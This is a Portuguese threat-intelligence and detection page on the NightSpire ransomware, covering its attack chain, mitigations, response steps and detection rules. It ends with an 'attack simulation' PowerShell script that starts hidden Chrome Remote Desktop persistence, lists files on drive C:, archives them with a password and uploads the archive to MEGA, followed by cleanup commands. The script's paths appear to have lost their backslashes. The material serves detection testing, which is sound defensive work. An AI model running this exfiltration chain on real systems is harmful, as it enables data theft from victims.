Cadeia de Ataque do Ransomware NightSpire, Ferramentas e Táticas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
NightSpire é uma família de ransomware baseada em Go observada pela primeira vez no início de 2025 que usa um modelo de dupla extorsão, roubando dados antes da criptografia e ameaçando publicá-los em um site de vazamento baseado em Tor. O ransomware anexa uma .nspire extensão a arquivos criptografados e coloca notas de resgate em cada diretório afetado, incluindo pastas vinculadas ao OneDrive. Seus operadores dependem de ferramentas legítimas de administração remota para manter o acesso e usam utilitários disponíveis publicamente para descoberta, arquivamento e exfiltração. Entre março e junho de 2025, a campanha impactou pelo menos 64 organizações em 33 países.
Investigação
A investigação mostrou que os atacantes frequentemente ganharam acesso inicial através de RDP expostos e então instalaram Chrome Remote Desktop e AnyDesk como serviços persistentes. Eles usaram Everything para localizar rapidamente arquivos, 7-Zip para construir arquivos protegidos por senha, e MEGAsync para fazer upload dos dados roubados para o armazenamento em nuvem MEGA. O encriptador baseado em Go rodava sob conhost.exe, enumerava todos os drives disponíveis, e criptografava arquivos enquanto deixava inalterados os nomes de arquivos do OneDrive. A fase de extorsão dependia de um site de vazamento hospedado em Tor usado para pressionar as vítimas após a exfiltração.
Mitigação
As organizações devem reduzir ou eliminar a exposição direta do RDP, monitorar a implantação inesperada de ferramentas legítimas de administração remota como serviços, e aplicar lista de permissão de aplicativos a binários como Chrome Remote Desktop e AnyDesk. As detecções comportamentais devem focar na enumeração massiva de arquivos, criação de arquivos e uploads incomuns para serviços de armazenamento em nuvem. Backups regulares e procedimentos de recuperação testados são essenciais, e controles de rede devem bloquear endpoints conhecidos de upload do MEGA. As defesas também podem ser validadas através de exercícios de simulação de ransomware controlados, como os oferecidos pela Picus.
Resposta
Se a atividade do NightSpire for detectada, isole o endpoint afetado imediatamente, termine o processo do encriptador e colete memória volátil para análise. Desative quaisquer serviços maliciosos, remova as ferramentas de acesso remoto persistentes e bloqueie a comunicação de rede relacionada. A recuperação deve proceder a partir de backups confiáveis, e as partes interessadas relevantes devem ser notificadas. O incidente também deve ser relatado às autoridades policiais, enquanto os defensores continuam monitorando o site de vazamento associado em Tor por sinais de dados publicados.
Fluxo de Ataque
Detecções
Possível Coleta de Dados [7zip] (via linha de comando)
Ver
Software Alternativo de Acesso Remoto / Gestão (via criação de processo)
Ver
Possível Instalação Oculta do Chrome Remote Desktop (via linha de comando)
Ver
Software Alternativo de Acesso Remoto / Gestão (via sistema)
Ver
Software Alternativo de Acesso Remoto / Gestão (via auditoria)
Ver
Detecção de Ferramentas de Persistência e Exfiltração do Ransomware NightSpire [Criação de Processo no Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação de Pré-voo de Telemetria e Base deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e ter o objetivo de gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa e Comandos de Ataque:
- Configuração de Persistência (T1547 / T1219): Instale o Chrome Remote Desktop (caminho padrão) e inicie seu serviço para obter controle remoto persistente.
- Descoberta (T1083): Use Everything.exe para enumerar todos os arquivos no drive C:, salvando a saída em uma lista temporária.
- Arquivamento (T1037 / T1083): Invoque o 7-Zip para comprimir os arquivos descobertos em um arquivo protegido por senha.
- Exfiltração (T1219.003): Inicie MEGAsync para carregar o arquivo em uma conta MEGA.
A sequência assegura que seleção_acesso_remoto (Chrome Remote Desktop) esteja ativo enquanto pelo menos um de seleção_descoberta, seleção_arquivo, ou seleção_exfiltração ocorra, satisfazendo a condição da regra.
-
Script de Teste de Regressão:
# ------------------------------------------------------------------------- # Simulação de Persistência Lateral e Exfiltração do NightSpire # ------------------------------------------------------------------------- # Pré-requisitos: # - Chrome Remote Desktop instalado no caminho padrão # - Everything.exe instalado no caminho padrão # - 7z.exe instalado no caminho padrão # - MEGAsync instalado no caminho padrão do perfil de usuário # ------------------------------------------------------------------------- # 1. Assegure-se de que o serviço Chrome Remote Desktop está rodando (simula persistência) $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe" if (Test-Path $crdPath) { Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden Write-Host "Chrome Remote Desktop service started." } else { Write-Error "Chrome Remote Desktop not found at $crdPath" exit 1 } # 2. Descoberta de arquivos com Everything $everythingPath = "$Env:ProgramFilesEverythingEverything.exe" $discoveryOutput = "$env:TEMPfilelist.txt" if (Test-Path $everythingPath) { & $everythingPath -search "C:" -output $discoveryOutput Write-Host "Discovery completed, results saved to $discoveryOutput" } else { Write-Error "Everything.exe not found at $everythingPath" exit 1 } # 3. Arquive os arquivos descobertos com 7-Zip $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe" $archivePath = "$env:TEMPexfil_archive.zip" if (Test-Path $sevenZipPath) { & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!" Write-Host "Archive created at $archivePath" } else { Write-Error "7z.exe not found at $sevenZipPath" exit 1 } # 4. Faça upload do arquivo via MEGAsync (exfiltração) $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe" if (Test-Path $megaPath) { & $megaPath --upload $archivePath Write-Host "Upload initiated via MEGAsync." } else { Write-Error "MEGAsync.exe not found at $megaPath" exit 1 } # End of simulation -
Comandos de Limpeza:
# Pare o serviço Chrome Remote Desktop Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue # Remova arquivos temporários Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue # Opcionalmente pare MEGAsync se estiver rodando Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue